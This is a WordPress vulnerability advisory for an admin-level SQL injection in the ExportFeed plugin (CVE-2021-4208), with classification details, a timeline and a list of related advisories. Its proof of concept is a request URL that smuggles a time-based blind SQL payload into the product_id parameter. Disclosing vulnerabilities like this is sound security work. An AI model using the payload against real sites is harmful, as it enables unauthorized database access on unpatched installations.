WordPress Plugin Vulnerabilities

ExportFeed <= 2.0.1.0 - Admin+ SQL Injection

Description

The plugin does not sanitise and escape the product_id POST parameter before using it in a SQL statement, leading to a SQL injection vulnerability exploitable by high privilege users

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?feedpath=core/ajax/wp/fetch_product_ajax.php&action=ebcpf_ebayseller_handles&security=1c6e01b2a4&category=&sku=snake&merchat_type=eBaySeller&service_name=eBaySeller&showOutofStock=1&limit=0,&q=savep&local_cat_ids=1&product_id=1+AND+(SELECT+9979+FROM+(SELECT(SLEEP(5)))IHgj)

Affects Plugins

Plugin icon
exportfeed-list-woocommerce-products-on-ebay-store
No known fix

References

CVE
CVE-2021-4208

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
0xdecafbad
Submitter
0xdecafbad
Verified
Yes
WPVDB ID
0cf63b44-f709-4ba4-be14-1eea934c2007

Timeline

Publicly Published
2021-11-22 (about 2 years ago)
Added
2022-01-21 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)

Other

Published
Title
Published
2015-06-08
Title
Easy2Map < 1.2.5 - SQL Injection
Published
2021-02-08
Title
Welcart e-Commerce < 2.1.1 - Authenticated SQL Injection
Published
2014-08-01
Title
Zotpress <= 4.4 - SQL Injection
Published
2014-08-01
Title
ENL Newsletter 1.0.1 - wp-admin/admin.php enl-add-new Page id Parameter SQL Injection
Published
2023-04-19
Title
Accessibility Suite by Online ADA <= 4.11 - Subscriber+ SQLi